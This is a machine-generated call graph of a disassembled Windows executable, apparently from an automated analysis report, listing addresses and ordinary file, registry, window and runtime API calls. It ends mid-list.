340842 101973->101975 101977 304ade 3 API calls 101975->101977 101979 34084a 101977->101979 101978 304a14 101978->101979 101980 304a20 101978->101980 102184 304ab2 101979->102184 101981 304a2f 84 API calls 101980->101981 101983 3027af 101981->101983 101983->101927 101983->101928 101986 340871 102192 304a6e 101986->102192 101988 34087e 101990 33fc94 101989->101990 101991 3029e7 101989->101991 102566 34fd3f 89 API calls 4 library calls 101990->102566 102549 303df7 60 API calls Mailbox 101991->102549 101994 302a09 102550 303e47 67 API calls 101994->102550 101995 33fca7 102567 34fd3f 89 API calls 4 library calls 101995->102567 101997 302a1e 101997->101995 101999 302a26 101997->101999 102001 301207 59 API calls 101999->102001 102000 33fcc3 102003 302a93 102000->102003 102002 302a32 102001->102002 102551 310ab6 60 API calls __ftell_nolock 102002->102551 102005 302aa1 102003->102005 102006 33fcd6 102003->102006 102009 301207 59 API calls 102005->102009 102008 3042cf CloseHandle 102006->102008 102007 302a3e 102010 301207 59 API calls 102007->102010 102012 33fce2 102008->102012 102013 302aaa 102009->102013 102011 302a4a 102010->102011 102014 3101af 60 API calls 102011->102014 102015 3049c2 136 API calls 102012->102015 102016 301207 59 API calls 102013->102016 102017 302a58 102014->102017 102018 33fcfe 102015->102018 102019 302ab3 102016->102019 102552 303ea1 ReadFile SetFilePointerEx 102017->102552 102021 33fd23 102018->102021 102024 359983 122 API calls 102018->102024 102022 310044 59 API calls 102019->102022 102568 34fd3f 89 API calls 4 library calls 102021->102568 102025 302aca 102022->102025 102023 302a84 102553 30410a SetFilePointerEx SetFilePointerEx 102023->102553 102028 33fd16 102024->102028 102554 3017e0 59 API calls Mailbox 102025->102554 102030 33fd3f 102028->102030 102031 33fd1e 102028->102031 102033 304a2f 84 API calls 102030->102033 102034 304a2f 84 API calls 102031->102034 102032 302adb SetCurrentDirectoryW 102035 302aee Mailbox 102032->102035 102036 33fd44 102033->102036 102034->102021 102039 310f16 Mailbox 59 API calls 102035->102039 102037 310f16 Mailbox 59 API calls 102036->102037 102043 33fd78 102037->102043 102041 302b01 102039->102041 102040 3027ef 102040->101678 102040->101679 102042 30433f 59 API calls 102041->102042 102070 302b0c Mailbox __wsetenvp 102042->102070 102044 30343f 59 API calls 102043->102044 102078 33fdc1 Mailbox 102044->102078 102045 302c19 102562 3042cf 102045->102562 102048 33ffb2 102051 357707 59 API calls 102048->102051 102056 34004b 102574 34fd3f 89 API calls 4 library calls 102056->102574 102060 30343f 59 API calls 102060->102078 102062 302c3e Mailbox 102544 303e25 102062->102544 102064 340043 102573 34fb95 59 API calls 4 library calls 102064->102573 102067 301a36 59 API calls 102067->102070 102068 34fcdb 59 API calls 102068->102078 102070->102045 102070->102056 102070->102064 102070->102067 102555 303ebe 67 API calls _wcscpy 102070->102555 102556 302e8f GetStringTypeW 102070->102556 102557 302dfe 60 API calls __wcsnicmp 102070->102557 102558 302edc GetStringTypeW __wsetenvp 102070->102558 102559 31379f GetStringTypeW _iswctype 102070->102559 102560 3027fc 165 API calls 3 library calls 102070->102560 102561 30314d 59 API calls Mailbox 102070->102561 102071 301a36 59 API calls 102071->102078 102073 3577a7 59 API calls 102073->102078 102075 340004 102572 34fd3f 89 API calls 4 library calls 102075->102572 102078->102048 102078->102060 102078->102068 102078->102071 102078->102073 102078->102075 102569 34fbfc 61 API calls 2 library calls 102078->102569 102570 30314d 59 API calls Mailbox 102078->102570 102080 33fd3a 102080->102062 102082 304a8c 85 API calls 102081->102082 102083 3599f2 102082->102083 102575 359b5e 102083->102575 102086 304ab2 74 API calls 102087 359a21 102086->102087 102088 304ab2 74 API calls 102087->102088 102089 359a31 102088->102089 102090 304ab2 74 API calls 102089->102090 102091 359a4c 102090->102091 102092 304ab2 74 API calls 102091->102092 102093 359a67 102092->102093 102094 304a8c 85 API calls 102093->102094 102095 359a7e 102094->102095 102096 31586c _W_store_winword 58 API calls 102095->102096 102097 359a85 102096->102097 102098 31586c _W_store_winword 58 API calls 102097->102098 102099 359a8f 102098->102099 102100 304ab2 74 API calls 102099->102100 102101 359aa3 102100->102101 102102 359531 GetSystemTimeAsFileTime 102101->102102 102103 359ab6 102102->102103 102104 359ae0 102103->102104 102105 359acb 102103->102105 102106 359b45 102104->102106 102107 359ae6 102104->102107 102108 312eb5 _free 58 API calls 102105->102108 102115 33f867 102115->101933 102115->101934 102117 310f16 Mailbox 59 API calls 102116->102117 102118 34fd0b _memmove 102117->102118 102118->101957 102120 3577b2 102119->102120 102121 310f16 Mailbox 59 API calls 102120->102121 102122 3577c9 102121->102122 102123 301a36 59 API calls 102122->102123 102124 3577d8 102122->102124 102123->102124 102124->101957 102126 3034df 102125->102126 102132 303452 _memmove 102125->102132 102128 310f16 Mailbox 59 API calls 102126->102128 102127 310f16 Mailbox 59 API calls 102129 303459 102127->102129 102128->102132 102130 310f16 Mailbox 59 API calls 102129->102130 102131 303482 102129->102131 102130->102131 102131->101957 102132->102127 102134 3032aa 102133->102134 102138 303358 102133->102138 102135 3032dc 102134->102135 102136 310f16 Mailbox 59 API calls 102134->102136 102137 310f16 59 API calls Mailbox 102135->102137 102135->102138 102136->102135 102137->102135 102138->101957 102140 304a39 102139->102140 102144 304a40 102139->102144 102141 3154f6 __fcloseall 83 API calls 102140->102141 102141->102144 102142 304a60 FreeLibrary 102143 304a4f 102142->102143 102143->101936 102144->102142 102144->102143 102145->101942 102146->101957 102147->101951 102197 304b77 102148->102197 102151 304b50 102153 304b60 FreeLibrary 102151->102153 102154 3049d4 102151->102154 102152 304b77 2 API calls 102152->102151 102153->102154 102155 3153ab 102154->102155 102201 3153c0 102155->102201 102157 3049e1 102157->101970 102157->101971 102282 304baa 102158->102282 102161 304b03 102162 304b15 FreeLibrary 102161->102162 102163 304a05 102161->102163 102162->102163 102165 3048b0 102163->102165 102164 304baa 2 API calls 102164->102161 102166 310f16 Mailbox 59 API calls 102165->102166 102167 3048c5 102166->102167 102168 30433f 59 API calls 102167->102168 102169 3048d1 _memmove 102168->102169 102170 30490c 102169->102170 102171 34078a 102169->102171 102173 304a6e 69 API calls 102170->102173 102172 340797 102171->102172 102291 359d45 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 102171->102291 102292 359dcb 95 API calls 102172->102292 102178 304915 102173->102178 102176 304ab2 74 API calls 102176->102178 102177 3407d9 102286 304a8c 102177->102286 102178->102176 102178->102177 102179 3049a0 102178->102179 102183 304a8c 85 API calls 102178->102183 102179->101978 102182 304ab2 74 API calls 102182->102179 102183->102178 102185 304ac4 102184->102185 102188 3408c5 102184->102188 102398 315732 102185->102398 102189 359531 102523 359387 102189->102523 102191 359547 102191->101986 102193 340888 102192->102193 102194 304a7d 102192->102194 102528 315db0 102194->102528 102196 304a85 102196->101988 102198 304b44 102197->102198 102199 304b80 LoadLibraryA 102197->102199 102198->102151 102198->102152 102199->102198 102200 304b91 GetProcAddress 102199->102200 102200->102198 102202 3153cc __ioinit 102201->102202 102203 3153df 102202->102203 102206 315410 102202->102206 102250 318c88 58 API calls __getptd_noexit 102203->102250 102205 3153e4 102251 318f16 9 API calls __wopenfile 102205->102251 102220 320648 102206->102220 102209 315415 102210 31542b 102209->102210 102211 31541e 102209->102211 102213 315455 102210->102213 102214 315435 102210->102214 102252 318c88 58 API calls __getptd_noexit 102211->102252 102235 320767 102213->102235 102253 318c88 58 API calls __getptd_noexit 102214->102253 102218 3153ef __ioinit @_EH4_CallFilterFunc@8 102218->102157 102221 320654 __ioinit 102220->102221 102222 319d6b __lock 58 API calls 102221->102222 102223 320662 102222->102223 102224 3206dd 102223->102224 102231 319df3 __mtinitlocknum 58 API calls 102223->102231 102233 3206d6 102223->102233 102258 316dad 59 API calls __lock 102223->102258 102259 316e17 LeaveCriticalSection LeaveCriticalSection _doexit 102223->102259 102260 31897d 58 API calls 2 library calls 102224->102260 102227 320753 __ioinit 102227->102209 102228 3206e4 102228->102233 102261 319f8b InitializeCriticalSectionAndSpinCount 102228->102261 102231->102223 102232 32070a EnterCriticalSection 102232->102233 102255 32075e 102233->102255 102244 320787 __wopenfile 102235->102244 102236 3207a1 102266 318c88 58 API calls __getptd_noexit 102236->102266 102238 32095c 102238->102236 102241 3209bf 102238->102241 102239 3207a6 102267 318f16 9 API calls __wopenfile 102239->102267 102263 328701 102241->102263 102242 315460 102254 315482 LeaveCriticalSection LeaveCriticalSection __wfsopen 102242->102254 102244->102236 102244->102238 102268 31392b 60 API calls 2 library calls 102244->102268 102246 320955 102246->102238 102269 31392b 60 API calls 2 library calls 102246->102269 102248 320974 102248->102238 102270 31392b 60 API calls 2 library calls 102248->102270 102250->102205 102251->102218 102252->102218 102253->102218 102254->102218 102262 319ed5 LeaveCriticalSection 102255->102262 102257 320765 102257->102227 102258->102223 102259->102223 102260->102228 102261->102232 102262->102257 102271 327ee5 102263->102271 102265 32871a 102265->102242 102266->102239 102267->102242 102268->102246 102269->102248 102270->102238 102272 327ef1 __ioinit 102271->102272 102273 327f07 102272->102273 102276 327f3d 102272->102276 102274 318c88 __wopenfile 58 API calls 102273->102274 102275 327f0c 102274->102275 102277 318f16 __wopenfile 9 API calls 102275->102277 102278 327fae __wsopen_nolock 109 API calls 102276->102278 102281 327f16 __ioinit 102277->102281 102279 327f59 102278->102279 102280 327f82 __wsopen_helper LeaveCriticalSection 102279->102280 102280->102281 102281->102265 102283 304af7 102282->102283 102284 304bb3 LoadLibraryA 102282->102284 102283->102161 102283->102164 102284->102283 102285 304bc4 GetProcAddress 102284->102285 102285->102283 102287 3408a3 102286->102287 102288 304a9b 102286->102288 102293 31599d 102288->102293 102290 304aa9 102290->102182 102291->102172 102292->102178 102294 3159a9 __ioinit 102293->102294 102295 3159bb 102294->102295 102297 3159e1 102294->102297 102324 318c88 58 API calls __getptd_noexit 102295->102324 102306 316d6e 102297->102306 102299 3159c0 102325 318f16 9 API calls __wopenfile 102299->102325 102305 3159cb __ioinit 102305->102290 102307 316da0 EnterCriticalSection 102306->102307 102308 316d7e 102306->102308 102309 3159e7 102307->102309 102308->102307 102310 316d86 102308->102310 102312 31590e 102309->102312 102311 319d6b __lock 58 API calls 102310->102311 102311->102309 102313 31592c 102312->102313 102314 31591c 102312->102314 102316 315942 102313->102316 102327 315a20 102313->102327 102397 318c88 58 API calls __getptd_noexit 102314->102397 102356 314b8d 102316->102356 102317 315921 102326 315a18 LeaveCriticalSection LeaveCriticalSection __wfsopen 102317->102326 102322 315983 102369 32178f 102322->102369 102324->102299 102325->102305 102326->102305 102328 315a2d __ftell_nolock 102327->102328 102329 315a45 102328->102329 102330 315a5d 102328->102330 102331 318c88 __wopenfile 58 API calls 102329->102331 102332 314836 __filbuf 58 API calls 102330->102332 102333 315a4a 102331->102333 102334 315a65 102332->102334 102335 318f16 __wopenfile 9 API calls 102333->102335 102336 32178f __write 64 API calls 102334->102336 102354 315a55 102335->102354 102337 315a81 102336->102337 102340 315c71 102337->102340 102342 315b04 102337->102342 102337->102354 102338 31c756 __setmbcp_nolock 6 API calls 102339 315dac 102338->102339 102339->102316 102341 315c7a 102340->102341 102347 315c2d 102340->102347 102343 318c88 __wopenfile 58 API calls 102341->102343 102344 315b2a 102342->102344 102342->102347 102343->102354 102345 321925 __lseeki64 62 API calls 102344->102345 102344->102354 102346 315b63 102345->102346 102349 315b8f ReadFile 102346->102349 102346->102354 102348 32178f __write 64 API calls 102347->102348 102347->102354 102350 315cde 102348->102350 102351 315bb4 102349->102351 102349->102354 102352 32178f __write 64 API calls 102350->102352 102350->102354 102353 32178f __write 64 API calls 102351->102353 102352->102354 102355 315bc7 102353->102355 102354->102338 102355->102354 102357 314ba0 102356->102357 102361 314bc4 102356->102361 102358 314836 __filbuf 58 API calls 102357->102358 102357->102361 102359 314bbd 102358->102359 102360 31d9e6 __write 78 API calls 102359->102360 102360->102361 102362 314836 102361->102362 102363 314840 102362->102363 102364 314855 102362->102364 102365 318c88 __wopenfile 58 API calls 102363->102365 102364->102322 102366 314845 102365->102366 102367 318f16 __wopenfile 9 API calls 102366->102367 102368 314850 102367->102368 102368->102322 102370 32179b __ioinit 102369->102370 102371 3217a8 102370->102371 102372 3217bf 102370->102372 102374 318c54 __commit 58 API calls 102371->102374 102373 32185e 102372->102373 102375 3217d3 102372->102375 102376 318c54 __commit 58 API calls 102373->102376 102377 3217ad 102374->102377 102379 3217f1 102375->102379 102380 3217fb 102375->102380 102381 3217f6 102376->102381 102378 318c88 __wopenfile 58 API calls 102377->102378 102382 3217b4 __ioinit 102378->102382 102383 318c54 __commit 58 API calls 102379->102383 102384 31d366 ___lock_fhandle 59 API calls 102380->102384 102386 318c88 __wopenfile 58 API calls 102381->102386 102382->102317 102383->102381 102385 321801 102384->102385 102387 321827 102385->102387 102388 321814 102385->102388 102389 32186a 102386->102389 102392 318c88 __wopenfile 58 API calls 102387->102392 102390 32187e __lseek_nolock 62 API calls 102388->102390 102391 318f16 __wopenfile 9 API calls 102389->102391 102395 321820 102390->102395 102391->102382 102393 32182c 102392->102393 102394 318c54 __commit 58 API calls 102393->102394 102394->102395 102396 321856 __write LeaveCriticalSection 102395->102396 102396->102382 102397->102317 102401 31574d 102398->102401 102400 304ad5 102400->102189 102402 315759 __ioinit 102401->102402 102403 31579c 102402->102403 102404 31576f _memset 102402->102404 102413 315794 __ioinit 102402->102413 102405 316d6e __lock_file 59 API calls 102403->102405 102428 318c88 58 API calls __getptd_noexit 102404->102428 102407 3157a2 102405->102407 102414 31556d 102407->102414 102408 315789 102429 318f16 9 API calls __wopenfile 102408->102429 102413->102400 102415 315588 _memset 102414->102415 102427 3155a3 102414->102427 102416 315593 102415->102416 102424 3155e3 102415->102424 102415->102427 102519 318c88 58 API calls __getptd_noexit 102416->102519 102418 315598 102520 318f16 9 API calls __wopenfile 102418->102520 102421 3156f4 _memset 102522 318c88 58 API calls __getptd_noexit 102421->102522 102422 314836 __filbuf 58 API calls 102422->102424 102424->102421 102424->102422 102424->102427 102431 320fbe 102424->102431 102499 320d07 102424->102499 102521 320e28 58 API calls 3 library calls 102424->102521 102430 3157d6 LeaveCriticalSection LeaveCriticalSection __wfsopen 102427->102430 102428->102408 102429->102413 102430->102413 102432 320ff6 102431->102432 102433 320fdf 102431->102433 102434 32172e 102432->102434 102439 321030 102432->102439 102435 318c54 __commit 58 API calls 102433->102435 102437 318c54 __commit 58 API calls 102434->102437 102436 320fe4 102435->102436 102438 318c88 __wopenfile 58 API calls 102436->102438 102440 321733 102437->102440 102481 320feb 102438->102481 102441 321038 102439->102441 102447 32104f 102439->102447 102442 318c88 __wopenfile 58 API calls 102440->102442 102443 318c54 __commit 58 API calls 102441->102443 102444 321044 102442->102444 102445 32103d 102443->102445 102448 318f16 __wopenfile 9 API calls 102444->102448 102451 318c88 __wopenfile 58 API calls 102445->102451 102446 321064 102449 318c54 __commit 58 API calls 102446->102449 102447->102446 102450 32107e 102447->102450 102452 32109c 102447->102452 102447->102481 102448->102481 102449->102445 102450->102446 102455 321089 102450->102455 102451->102444 102453 31897d __malloc_crt 58 API calls 102452->102453 102456 3210ac 102453->102456 102454 325dcb __flswbuf 58 API calls 102457 32119d 102454->102457 102455->102454 102458 3210b4 102456->102458 102459 3210cf 102456->102459 102460 321216 ReadFile 102457->102460 102466 3211b3 GetConsoleMode 102457->102466 102462 318c88 __wopenfile 58 API calls 102458->102462 102461 321a21 __lseeki64_nolock 60 API calls 102459->102461 102463 3216f6 GetLastError 102460->102463 102464 321238 102460->102464 102461->102455 102465 3210b9 102462->102465 102467 321703 102463->102467 102468 3211f6 102463->102468 102464->102463 102473 321208 102464->102473 102469 318c54 __commit 58 API calls 102465->102469 102470 321213 102466->102470 102471 3211c7 102466->102471 102472 318c88 __wopenfile 58 API calls 102467->102472 102475 3211fc 102468->102475 102478 318c67 __dosmaperr 58 API calls 102468->102478 102469->102481 102470->102460 102471->102470 102474 3211cd ReadConsoleW 102471->102474 102476 321708 102472->102476 102473->102475 102480 32126d 102473->102480 102489 3214da 102473->102489 102474->102473 102477 3211f0 GetLastError 102474->102477 102475->102481 102482 312eb5 _free 58 API calls 102475->102482 102479 318c54 __commit 58 API calls 102476->102479 102477->102468 102478->102475 102479->102475 102484 3212d9 ReadFile 102480->102484 102490 32135a 102480->102490 102481->102424 102482->102481 102485 3212fa GetLastError 102484->102485 102498 321304 102484->102498 102485->102498 102486 321417 102493 3213c7 MultiByteToWideChar 102486->102493 102494 321a21 __lseeki64_nolock 60 API calls 102486->102494 102487 321407 102491 318c88 __wopenfile 58 API calls 102487->102491 102488 3215e0 ReadFile 102492 321603 GetLastError 102488->102492 102497 321611 102488->102497 102489->102475 102489->102488 102490->102475 102490->102486 102490->102487 102490->102493 102491->102475 102492->102497 102493->102475 102493->102477 102494->102493 102495 321a21 __lseeki64_nolock 60 API calls 102495->102498 102496 321a21 __lseeki64_nolock 60 API calls 102496->102497 102497->102489 102497->102496 102498->102480 102498->102495 102500 320d12 102499->102500 102504 320d27 102499->102504 102501 318c88 __wopenfile 58 API calls 102500->102501 102502 320d17 102501->102502 102503 318f16 __wopenfile 9 API calls 102502->102503 102511 320d22 102503->102511 102505 320d5c 102504->102505 102506 326144 __getbuf 58 API calls 102504->102506 102504->102511 102507 314836 __filbuf 58 API calls 102505->102507 102506->102505 102508 320d70 102507->102508 102509 320ea7 __read 72 API calls 102508->102509 102510 320d77 102509->102510 102510->102511 102512 314836 __filbuf 58 API calls 102510->102512 102511->102424 102513 320d9a 102512->102513 102513->102511 102514 314836 __filbuf 58 API calls 102513->102514 102515 320da6 102514->102515 102515->102511 102516 314836 __filbuf 58 API calls 102515->102516 102517 320db3 102516->102517 102518 314836 __filbuf 58 API calls 102517->102518 102518->102511 102519->102418 102520->102427 102521->102424 102522->102418 102526 31535a GetSystemTimeAsFileTime 102523->102526 102525 359396 102525->102191 102527 315388 __aulldiv 102526->102527 102527->102525 102529 315dbc __ioinit 102528->102529 102530 315de3 102529->102530 102531 315dce 102529->102531 102533 316d6e __lock_file 59 API calls 102530->102533 102541 318c88 58 API calls __getptd_noexit 102531->102541 102535 315de9 102533->102535 102534 315dd3 102542 318f16 9 API calls __wopenfile 102534->102542 102537 315a20 __ftell_nolock 67 API calls 102535->102537 102539 315df4 102537->102539 102538 315dde __ioinit 102538->102196 102543 315e14 LeaveCriticalSection LeaveCriticalSection __wfsopen 102539->102543 102541->102534 102542->102538 102543->102538 102545 3042cf CloseHandle 102544->102545 102546 303e2d Mailbox 102545->102546 102547 3042cf CloseHandle 102546->102547 102548 303e3c 102547->102548 102548->102040 102549->101994 102550->101997 102551->102007 102552->102023 102553->102003 102554->102032 102555->102070 102556->102070 102557->102070 102558->102070 102559->102070 102560->102070 102561->102070 102566->101995 102567->102000 102568->102080 102569->102078 102570->102078 102573->102056 102580 359b72 __tzset_nolock _wcscmp 102575->102580 102576 304ab2 74 API calls 102576->102580 102577 359a06 102577->102086 102577->102115 102578 359531 GetSystemTimeAsFileTime 102578->102580 102579 304a8c 85 API calls 102579->102580 102580->102576 102580->102577 102580->102578 102580->102579 102780 2f9a6c 102783 2f829c 102780->102783 102782 2f9a78 102784 2f8308 102783->102784 102785 2f82b4 102783->102785 102789 2f8331 102784->102789 102793 35a2fa 89 API calls 4 library calls 102784->102793 102785->102784 102786 2f53b0 294 API calls 102785->102786 102790 2f82eb 102786->102790 102788 330e08 102788->102788 102789->102782 102790->102789 102792 2f523c 59 API calls 102790->102792 102792->102784 102793->102788 102794 2f9a88 102797 2f86e0 102794->102797 102798 2f86fd 102797->102798 102799 330f28 102798->102799 102800 330edd 102798->102800 102822 2f8724 102798->102822 102837 36a898 294 API calls __cinit 102799->102837 102803 330ee5 102800->102803 102806 330ef2 102800->102806 102800->102822 102835 36aeac 294 API calls 102803->102835 102804 312ea0 __cinit 67 API calls 102804->102822 102811 2f898d 102806->102811 102836 36b354 294 API calls 3 library calls 102806->102836 102809 3311b9 102809->102809 102810 2f3c30 68 API calls 102810->102822 102816 2f8a17 102811->102816 102841 35a2fa 89 API calls 4 library calls 102811->102841 102812 3310df 102840 36ac03 89 API calls 102812->102840 102813 2f3f42 68 API calls 102813->102822 102817 2f39be 68 API calls 102817->102822 102822->102804 102822->102810 102822->102811 102822->102812 102822->102813 102822->102816 102822->102817 102823 2f53b0 294 API calls 102822->102823 102824 301c9c 59 API calls 102822->102824 102826 2f3938 68 API calls 102822->102826 102827 2f855e 294 API calls 102822->102827 102828 2f5278 102822->102828 102833 2f84e2 89 API calls 102822->102833 102834 2f835f 294 API calls 102822->102834 102838 2f523c 59 API calls 102822->102838 102839 34718e 59 API calls 102822->102839 102823->102822 102824->102822 102826->102822 102827->102822 102829 310f16 Mailbox 59 API calls 102828->102829 102830 2f5285 102829->102830 102831 2f5294 102830->102831 102832 301a36 59 API calls 102830->102832 102831->102822 102832->102831 102833->102822 102834->102822 102835->102806 102836->102811 102837->102822 102838->102822 102839->102822 102840->102811 102841->102809 102842 2f1066 102847 2faaaa 102842->102847 102844 2f106c 102845 312ea0 __cinit 67 API calls 102844->102845 102846 2f1076 102845->102846 102848 2faacb 102847->102848 102879 310216 102848->102879 102852 2fab12 102853 301207 59 API calls 102852->102853 102854 2fab1c 102853->102854 102855 301207 59 API calls 102854->102855 102856 2fab26 102855->102856 102857 301207 59 API calls 102856->102857 102858 2fab30 102857->102858 102859 301207 59 API calls 102858->102859 102860 2fab6e 102859->102860 102861 301207 59 API calls 102860->102861 102862 2fac39 102861->102862 102889 3104b3 102862->102889 102866 2fac6b 102867 301207 59 API calls 102866->102867 102868 2fac75 102867->102868 102917 30fd56 102868->102917 102870 2facbc 102871 2faccc GetStdHandle 102870->102871 102872 2fad18 102871->102872 102873 332e69 102871->102873 102874 2fad20 OleInitialize 102872->102874 102873->102872 102924 356f60 102873->102924 102874->102844 102876 332e79 102930 35762f 102876->102930 102933 3102ef 102879->102933 102882 3102ef 59 API calls 102883 310258 102882->102883 102884 301207 59 API calls 102883->102884 102885 310264 102884->102885 102886 301821 59 API calls 102885->102886 102887 2faad1 102886->102887 102888 3106e6 6 API calls 102887->102888 102888->102852 102890 301207 59 API calls 102889->102890 102891 3104c3 102890->102891 102892 301207 59 API calls 102891->102892 102893 3104cb 102892->102893 102940 3010c3 102893->102940 102896 3010c3 59 API calls 102897 3104db 102896->102897 102898 301207 59 API calls 102897->102898 102899 3104e6 102898->102899 102900 310f16 Mailbox 59 API calls 102899->102900 102901 2fac43 102900->102901 102902 30fe77 102901->102902 102903 30fe85 102902->102903 102904 301207 59 API calls 102903->102904 102905 30fe90 102904->102905 102906 301207 59 API calls 102905->102906 102907 30fe9b 102906->102907 102908 301207 59 API calls 102907->102908 102909 30fea6 102908->102909 102910 301207 59 API calls 102909->102910 102911 30feb1 102910->102911 102912 3010c3 59 API calls 102911->102912 102913 30febc 102912->102913 102914 310f16 Mailbox 59 API calls 102913->102914 102915 30fec3 RegisterWindowMessageW 102914->102915 102915->102866 102918 345ff1 102917->102918 102919 30fd66 102917->102919 102943 359f97 59 API calls 102918->102943 102921 310f16 Mailbox 59 API calls 102919->102921 102923 30fd6e 102921->102923 102922 345ffc 102923->102870 102925 310f16 Mailbox 59 API calls 102924->102925 102926 356f6a 102925->102926 102927 356f79 102926->102927 102944 356e47 InitializeCriticalSectionAndSpinCount 102926->102944 102927->102876 102929 356f77 102929->102876 102931 332e85 CloseHandle 102930->102931 102932 35763d CreateThread 102930->102932 102931->102874 102932->102931 102950 357615 102932->102950 102934 301207 59 API calls 102933->102934 102935 3102fa 102934->102935 102936 301207 59 API calls 102935->102936 102937 310302 102936->102937 102938 301207 59 API calls 102937->102938 102939 31024e 102938->102939 102939->102882 102941 301207 59 API calls 102940->102941 102942 3010cb 102941->102942 102942->102896 102943->102922 102947 35708e 102944->102947 102948 35709c GetCurrentProcess GetCurrentProcess DuplicateHandle 102947->102948 102949 356e83 InterlockedExchange 102947->102949 102948->102949 102949->102929 102951 357624 102950->102951 102952 35761f 102950->102952 102954 3574ee InterlockedExchange 102952->102954 102955 310f16 Mailbox 59 API calls 102954->102955 102956 357515 102955->102956 102957 310f16 Mailbox 59 API calls 102956->102957 102958 357528 ReadFile 102957->102958 102959 3575f5 102958->102959 102961 35754a 102958->102961 102963 3575fe InterlockedExchange 102959->102963 102960 357554 EnterCriticalSection 102960->102961 102962 35757c _memmove 102960->102962 102961->102959 102961->102960 102961->102962 102964 3575c8 LeaveCriticalSection ReadFile 102962->102964 102965 310f16 Mailbox 59 API calls 102962->102965 102963->102951 102964->102959 102964->102961 102965->102962 102966 2f6981 102967 2f373a 59 API calls 102966->102967 102968 2f6997 102967->102968 102973 2f7b3f 102968->102973 102970 2f69bf 102972 2f584d 102970->102972 102985 35a2fa 89 API calls 4 library calls 102970->102985 102974 30162d 59 API calls 102973->102974 102975 2f7b64 _wcscmp 102974->102975 102976 301a36 59 API calls 102975->102976 102978 2f7b98 Mailbox 102975->102978 102977 32fedd 102976->102977 102986 3017e0 59 API calls Mailbox 102977->102986 102978->102970 102980 32fee8 102987 2f3938 68 API calls 102980->102987 102982 32fef9 102984 32fefd Mailbox 102982->102984 102988 2f523c 59 API calls 102982->102988 102984->102970 102985->102972 102986->102980 102987->102982 102988->102984 102989 2f107d 102994 302fc5 102989->102994 102991 2f108c 102992 312ea0 __cinit 67 API calls 102991->102992 102993 2f1096 102992->102993 102995 302fd5 __ftell_nolock 102994->102995 102996 301207 59 API calls 102995->102996 102997 30308b 102996->102997 102998 30fffa 61 API calls 102997->102998 102999 303094 102998->102999 103025 3107ec 102999->103025 103002 301900 59 API calls 103003 3030ad 103002->103003 103004 304c94 59 API calls 103003->103004 103005 3030bc 103004->103005 103006 301207 59 API calls 103005->103006 103007 3030c5 103006->103007 103008 3019e1 59 API calls 103007->103008 103009 3030ce RegOpenKeyExW 103008->103009 103010 340123 RegQueryValueExW 103009->103010 103015 3030f0 Mailbox 103009->103015 103011 3401b5 RegCloseKey 103010->103011 103012 340140 103010->103012 103011->103015 103024 3401c7 _wcscat Mailbox __wsetenvp 103011->103024 103013 310f16 Mailbox 59 API calls 103012->103013 103014 340159 103013->103014 103016 30433f 59 API calls 103014->103016 103015->102991 103017 340164 RegQueryValueExW 103016->103017 103019 340181 103017->103019 103021 34019b 103017->103021 103018 301609 59 API calls 103018->103024 103020 301821 59 API calls 103019->103020 103020->103021 103021->103011 103022 301a36 59 API calls 103022->103024 103023 304c94 59 API calls 103023->103024 103024->103015 103024->103018 103024->103022 103024->103023 103026 321aa0 __ftell_nolock 103025->103026 103027 3107f9 GetFullPathNameW 103026->103027 103028 31081b 103027->103028 103029 301821 59 API calls 103028->103029 103030 30309f 103029->103030 103030->103002 103031 304d83 103032 304dba 103031->103032 103033 304e37 103032->103033 103034 304dd8 103032->103034 103075 304e35 103032->103075 103038 340942 103033->103038 103039 304e3d 103033->103039 103035 304de5 103034->103035 103036 304ead PostQuitMessage 103034->103036 103042 304df0 103035->103042 103043 3409b5 103035->103043 103071 304e28 103036->103071 103037 304e1a DefWindowProcW 103037->103071 103086 2fc460 10 API calls Mailbox 103038->103086 103040 304e42 103039->103040 103041 304e65 SetTimer RegisterWindowMessageW 103039->103041 103045 3408e5 103040->103045 103046 304e49 KillTimer 103040->103046 103047 304e8e CreatePopupMenu 103041->103047 103041->103071 103048 304eb7 103042->103048 103049 304df8 103042->103049 103089 352b3a 97 API calls _memset 103043->103089 103052 34091e MoveWindow 103045->103052 103053 3408ea 103045->103053 103054 305ac3 Shell_NotifyIconW 103046->103054 103047->103071 103076 305b29 103048->103076 103055 304e03 103049->103055 103056 34099a 103049->103056 103051 340969 103087 2fc483 294 API calls Mailbox 103051->103087 103052->103071 103060 34090d SetFocus 103053->103060 103061 3408ee 103053->103061 103062 304e5c 103054->103062 103063 304e9b 103055->103063 103070 304e0e 103055->103070 103056->103037 103088 348637 59 API calls Mailbox 103056->103088 103057 3409c7 103057->103037 103057->103071 103060->103071 103064 3408f7 103061->103064 103061->103070 103083 2f34e4 DeleteObject DestroyWindow Mailbox 103062->103083 103084 305bd7 107 API calls _memset 103063->103084 103085 2fc460 10 API calls Mailbox 103064->103085 103069 304eab 103069->103071 103070->103037 103072 305ac3 Shell_NotifyIconW 103070->103072 103073 34098e 103072->103073 103074 3059d3 94 API calls 103073->103074 103074->103075 103075->103037 103077 305b40 _memset 103076->103077 103078 305bc2 103076->103078 103079 3056f8 87 API calls 103077->103079 103078->103071 103081 305b67 103079->103081 103080 305bab KillTimer SetTimer 103080->103078 103081->103080 103082 340cee Shell_NotifyIconW 103081->103082 103082->103080 103083->103071 103084->103069 103085->103071 103086->103051 103087->103070 103088->103075 103089->103057 103090 2f1016 103095 305ce7 103090->103095 103093 312ea0 __cinit 67 API calls 103094 2f1025 103093->103094 103096 310f16 Mailbox 59 API calls 103095->103096 103097 305cef 103096->103097 103098 2f101b 103097->103098 103102 305f39 103097->103102 103098->103093 103103 305f42 103102->103103 103104 305cfb 103102->103104 103105 312ea0 __cinit 67 API calls 103103->103105 103106 305d13 103104->103106 103105->103104 103107 301207 59 API calls 103106->103107 103108 305d2b GetVersionExW 103107->103108 103109 301821 59 API calls 103108->103109 103110 305d6e 103109->103110 103111 301981 59 API calls 103110->103111 103114 305d9b 103110->103114 103112 305d8f 103111->103112 103113 30133d 59 API calls 103112->103113 103113->103114 103115 305e00 GetCurrentProcess IsWow64Process 103114->103115 103117 341018 103114->103117 103116 305e19 103115->103116 103118 305e98 GetSystemInfo 103116->103118 103119 305e2f 103116->103119 103120 305e65 103118->103120 103130 3055f0 103119->103130 103120->103098 103123 305e41 103126 3055f0 2 API calls 103123->103126 103124 305e8c GetSystemInfo 103125 305e56 103124->103125 103125->103120 103127 305e5c FreeLibrary 103125->103127 103128 305e49 GetNativeSystemInfo 103126->103128 103127->103120 103128->103125 103131 305619 103130->103131 103132 